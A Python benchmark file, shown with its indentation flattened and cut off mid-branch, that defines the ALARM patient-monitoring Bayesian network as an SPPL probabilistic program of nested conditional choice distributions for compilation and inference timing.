] | null | null | null | example/alarm_benchmark.py | shiruizhao/swift | 2026acce35f0717c7a3e9dc522ff1c69f8dc3227 | [
"BSD-4-Clause-UC",
"BSD-4-Clause"
] | null | null | null | example/alarm_benchmark.py | shiruizhao/swift | 2026acce35f0717c7a3e9dc522ff1c69f8dc3227 | [
"BSD-4-Clause-UC",
"BSD-4-Clause"
] | null | null | null | from sppl.compilers.ast_to_spe import Id
from sppl.compilers.ast_to_spe import IfElse
from sppl.compilers.ast_to_spe import Sample
from sppl.compilers.ast_to_spe import Sequence
from sppl.compilers.sppl_to_python import SPPL_Compiler
from sppl.distributions import atomic
from sppl.distributions import choice
from sppl.distributions import uniform
from sppl.math_util import allclose
from sppl.sets import Interval
from sppl.spe import ExposedSumSPE
from sppl.compilers.sppl_to_python import SPPL_Compiler
import os
import time
import numpy as np
isclose = lambda a, b : abs(a-b) < 1e-10
data = '''
ANAPHYLAXIS ~= choice({'TRUE' : 0.01,'FALSE' : 0.99})
DISCONNECT ~= choice({'TRUE' : 0.1,'FALSE' : 0.9})
ERRCAUTER ~= choice({'TRUE' : 0.1,'FALSE' : 0.9})
ERRLOWOUTPUT ~= choice({'TRUE' : 0.05,'FALSE' : 0.95})
FIO2 ~= choice({'LOW' : 0.05,'NORMAL' : 0.95})
HYPOVOLEMIA ~= choice({'TRUE' : 0.2,'FALSE' : 0.8})
INSUFFANESTH ~= choice({'TRUE' : 0.1,'FALSE' : 0.9})
INTUBATION ~= choice({'NORMAL' : 0.92,'ESOPHAGEAL' : 0.03,'ONESIDED' : 0.05})
KINKEDTUBE ~= choice({'TRUE' : 0.04,'FALSE' : 0.96})
LVFAILURE ~= choice({'TRUE' : 0.05,'FALSE' : 0.95})
MINVOLSET ~= choice({'LOW' : 0.05,'NORMAL' : 0.9,'HIGH' : 0.05})
PULMEMBOLUS ~= choice({'TRUE' : 0.01,'FALSE' : 0.99})
if (INTUBATION == 'NORMAL'):
if (PULMEMBOLUS == 'TRUE'):
SHUNT ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
else:
SHUNT ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
elif(INTUBATION == 'ESOPHAGEAL'):
if(PULMEMBOLUS == 'TRUE'):
SHUNT ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
else:
SHUNT ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
else:
if(PULMEMBOLUS == 'TRUE'):
SHUNT ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
SHUNT ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
if (HYPOVOLEMIA == 'TRUE'):
if (LVFAILURE == 'TRUE'):
STROKEVOLUME ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
STROKEVOLUME ~= choice({'LOW' : 0.5, 'NORMAL' : 0.49, 'HIGH' : 0.010000000000000009})
else:
if(LVFAILURE == 'TRUE'):
STROKEVOLUME ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
else:
STROKEVOLUME ~= choice({'LOW' : 0.05, 'NORMAL' : 0.9, 'HIGH' : 0.04999999999999993})
if (ANAPHYLAXIS == 'TRUE'):
TPR ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
TPR ~= choice({'LOW' : 0.3, 'NORMAL' : 0.4, 'HIGH' : 0.30000000000000004})
if (MINVOLSET == 'LOW'):
VENTMACH ~= choice({'ZERO' : 0.05, 'LOW' : 0.93, 'NORMAL' : 0.01, 'HIGH' : 0.009999999999999898})
elif(MINVOLSET == 'NORMAL'):
VENTMACH ~= choice({'ZERO' : 0.05, 'LOW' : 0.01, 'NORMAL' : 0.93, 'HIGH' : 0.009999999999999898})
else:
VENTMACH ~= choice({'ZERO' : 0.05, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.9299999999999999})
if (DISCONNECT == 'TRUE'):
if (VENTMACH == 'ZERO'):
VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTMACH == 'LOW'):
VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTMACH == 'NORMAL'):
VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
VENTTUBE ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
if(VENTMACH == 'ZERO'):
VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTMACH == 'LOW'):
VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTMACH == 'NORMAL'):
VENTTUBE ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
VENTTUBE ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (LVFAILURE == 'TRUE'):
HISTORY ~= choice({'TRUE' : 0.9, 'FALSE' : 0.09999999999999998})
else:
HISTORY ~= choice({'TRUE' : 0.01, 'FALSE' : 0.99})
if (HYPOVOLEMIA == 'TRUE'):
if (LVFAILURE == 'TRUE'):
LVEDVOLUME ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
else:
LVEDVOLUME ~= choice({'LOW' : 0.01, 'NORMAL' : 0.09, 'HIGH' : 0.9})
else:
if(LVFAILURE == 'TRUE'):
LVEDVOLUME ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
LVEDVOLUME ~= choice({'LOW' : 0.05, 'NORMAL' : 0.9, 'HIGH' : 0.04999999999999993})
if (PULMEMBOLUS == 'TRUE'):
PAP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.19, 'HIGH' : 0.8})
else:
PAP ~= choice({'LOW' : 0.05, 'NORMAL' : 0.9, 'HIGH' : 0.04999999999999993})
if (LVEDVOLUME == 'LOW'):
PCWP ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
elif(LVEDVOLUME == 'NORMAL'):
PCWP ~= choice({'LOW' : 0.04, 'NORMAL' : 0.95, 'HIGH' : 0.010000000000000009})
else:
PCWP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.04, 'HIGH' : 0.95})
if (INTUBATION == 'NORMAL'):
if (KINKEDTUBE == 'TRUE'):
if (VENTTUBE == 'ZERO'):
PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
PRESS ~= choice({'ZERO' : 0.05, 'LOW' : 0.25, 'NORMAL' : 0.25, 'HIGH' : 0.44999999999999996})
elif(VENTTUBE == 'NORMAL'):
PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
PRESS ~= choice({'ZERO' : 0.2, 'LOW' : 0.75, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
else:
if(VENTTUBE == 'ZERO'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
elif(VENTTUBE == 'LOW'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.29, 'NORMAL' : 0.3, 'HIGH' : 0.4})
elif(VENTTUBE == 'NORMAL'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
else:
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.9, 'NORMAL' : 0.08, 'HIGH' : 0.010000000000000009})
elif(INTUBATION == 'ESOPHAGEAL'):
if(KINKEDTUBE == 'TRUE'):
if(VENTTUBE == 'ZERO'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.3, 'NORMAL' : 0.49, 'HIGH' : 0.19999999999999996})
elif(VENTTUBE == 'LOW'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.15, 'NORMAL' : 0.25, 'HIGH' : 0.59})
elif(VENTTUBE == 'NORMAL'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
PRESS ~= choice({'ZERO' : 0.2, 'LOW' : 0.7, 'NORMAL' : 0.09, 'HIGH' : 0.01000000000000012})
else:
if(VENTTUBE == 'ZERO'):
PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.08, 'HIGH' : 0.9})
elif(VENTTUBE == 'NORMAL'):
PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.38, 'HIGH' : 0.6})
else:
if(KINKEDTUBE == 'TRUE'):
if(VENTTUBE == 'ZERO'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.08, 'HIGH' : 0.9})
elif(VENTTUBE == 'LOW'):
PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'NORMAL'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
PRESS ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
if(VENTTUBE == 'ZERO'):
PRESS ~= choice({'ZERO' : 0.1, 'LOW' : 0.84, 'NORMAL' : 0.05, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
elif(VENTTUBE == 'NORMAL'):
PRESS ~= choice({'ZERO' : 0.4, 'LOW' : 0.58, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
PRESS ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (INTUBATION == 'NORMAL'):
if (KINKEDTUBE == 'TRUE'):
if (VENTTUBE == 'ZERO'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'NORMAL'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
if(VENTTUBE == 'ZERO'):
VENTLUNG ~= choice({'ZERO' : 0.3, 'LOW' : 0.68, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
VENTLUNG ~= choice({'ZERO' : 0.95, 'LOW' : 0.03, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'NORMAL'):
VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
else:
VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(INTUBATION == 'ESOPHAGEAL'):
if(KINKEDTUBE == 'TRUE'):
if(VENTTUBE == 'ZERO'):
VENTLUNG ~= choice({'ZERO' : 0.95, 'LOW' : 0.03, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'NORMAL'):
VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
if(VENTTUBE == 'ZERO'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
VENTLUNG ~= choice({'ZERO' : 0.5, 'LOW' : 0.48, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'NORMAL'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
if(KINKEDTUBE == 'TRUE'):
if(VENTTUBE == 'ZERO'):
VENTLUNG ~= choice({'ZERO' : 0.4, 'LOW' : 0.58, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'NORMAL'):
VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
if(VENTTUBE == 'ZERO'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'LOW'):
VENTLUNG ~= choice({'ZERO' : 0.3, 'LOW' : 0.68, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTTUBE == 'NORMAL'):
VENTLUNG ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
VENTLUNG ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (LVEDVOLUME == 'LOW'):
CVP ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
elif(LVEDVOLUME == 'NORMAL'):
CVP ~= choice({'LOW' : 0.04, 'NORMAL' : 0.95, 'HIGH' : 0.010000000000000009})
else:
CVP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.29, 'HIGH' : 0.7})
if (INTUBATION == 'NORMAL'):
if (VENTLUNG == 'ZERO'):
MINVOL ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
elif(VENTLUNG == 'NORMAL'):
MINVOL ~= choice({'ZERO' : 0.5, 'LOW' : 0.48, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(INTUBATION == 'ESOPHAGEAL'):
if(VENTLUNG == 'ZERO'):
MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
MINVOL ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'NORMAL'):
MINVOL ~= choice({'ZERO' : 0.5, 'LOW' : 0.48, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
if(VENTLUNG == 'ZERO'):
MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
MINVOL ~= choice({'ZERO' : 0.6, 'LOW' : 0.38, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'NORMAL'):
MINVOL ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
MINVOL ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (INTUBATION == 'NORMAL'):
if (VENTLUNG == 'ZERO'):
VENTALV ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
elif(VENTLUNG == 'NORMAL'):
VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
VENTALV ~= choice({'ZERO' : 0.03, 'LOW' : 0.95, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(INTUBATION == 'ESOPHAGEAL'):
if(VENTLUNG == 'ZERO'):
VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
VENTALV ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'NORMAL'):
VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
else:
VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.94, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
else:
if(VENTLUNG == 'ZERO'):
VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'NORMAL'):
VENTALV ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
VENTALV ~= choice({'ZERO' : 0.01, 'LOW' : 0.88, 'NORMAL' : 0.1, 'HIGH' : 0.010000000000000009})
if (VENTALV == 'ZERO'):
ARTCO2 ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
elif(VENTALV == 'LOW'):
ARTCO2 ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
elif(VENTALV == 'NORMAL'):
ARTCO2 ~= choice({'LOW' : 0.04, 'NORMAL' : 0.92, 'HIGH' : 0.039999999999999925})
else:
ARTCO2 ~= choice({'LOW' : 0.9, 'NORMAL' : 0.09, 'HIGH' : 0.010000000000000009})
if (ARTCO2 == 'LOW'):
if (VENTLUNG == 'ZERO'):
EXPCO2 ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'NORMAL'):
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
elif(ARTCO2 == 'NORMAL'):
if(VENTLUNG == 'ZERO'):
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
EXPCO2 ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'NORMAL'):
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
else:
if(VENTLUNG == 'ZERO'):
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'LOW'):
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
elif(VENTLUNG == 'NORMAL'):
EXPCO2 ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
EXPCO2 ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (FIO2 == 'LOW'):
if (VENTALV == 'ZERO'):
PVSAT ~= choice({'LOW' : 1.0, 'NORMAL' : 0.0, 'HIGH' : 0.0})
elif(VENTALV == 'LOW'):
PVSAT ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
elif(VENTALV == 'NORMAL'):
PVSAT ~= choice({'LOW' : 1.0, 'NORMAL' : 0.0, 'HIGH' : 0.0})
else:
PVSAT ~= choice({'LOW' : 0.01, 'NORMAL' : 0.95, 'HIGH' : 0.040000000000000036})
else:
if(VENTALV == 'ZERO'):
PVSAT ~= choice({'LOW' : 0.99, 'NORMAL' : 0.01, 'HIGH' : 0.0})
elif(VENTALV == 'LOW'):
PVSAT ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
elif(VENTALV == 'NORMAL'):
PVSAT ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
else:
PVSAT ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (PVSAT == 'LOW'):
if (SHUNT == 'NORMAL'):
SAO2 ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
SAO2 ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(PVSAT == 'NORMAL'):
if(SHUNT == 'NORMAL'):
SAO2 ~= choice({'LOW' : 0.01, 'NORMAL' : 0.98, 'HIGH' : 0.010000000000000009})
else:
SAO2 ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
if(SHUNT == 'NORMAL'):
SAO2 ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
else:
SAO2 ~= choice({'LOW' : 0.69, 'NORMAL' : 0.3, 'HIGH' : 0.010000000000000009})
if (ARTCO2 == 'LOW'):
if (INSUFFANESTH == 'TRUE'):
if (SAO2 == 'LOW'):
if (TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
elif(SAO2 == 'NORMAL'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
else:
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
else:
if(SAO2 == 'LOW'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
elif(SAO2 == 'NORMAL'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
else:
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
elif(ARTCO2 == 'NORMAL'):
if(INSUFFANESTH == 'TRUE'):
if(SAO2 == 'LOW'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
elif(SAO2 == 'NORMAL'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
else:
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.99, 'HIGH' : 0.010000000000000009})
else:
if(SAO2 == 'LOW'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.7, 'HIGH' : 0.30000000000000004})
elif(SAO2 == 'NORMAL'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.99, 'HIGH' : 0.010000000000000009})
else:
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
else:
CATECHOL ~= choice({'NORMAL' : 0.99, 'HIGH' : 0.010000000000000009})
else:
if(INSUFFANESTH == 'TRUE'):
if(SAO2 == 'LOW'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
CATECHOL ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
elif(SAO2 == 'NORMAL'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
CATECHOL ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
else:
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
CATECHOL ~= choice({'NORMAL' : 0.3, 'HIGH' : 0.7})
else:
if(SAO2 == 'LOW'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
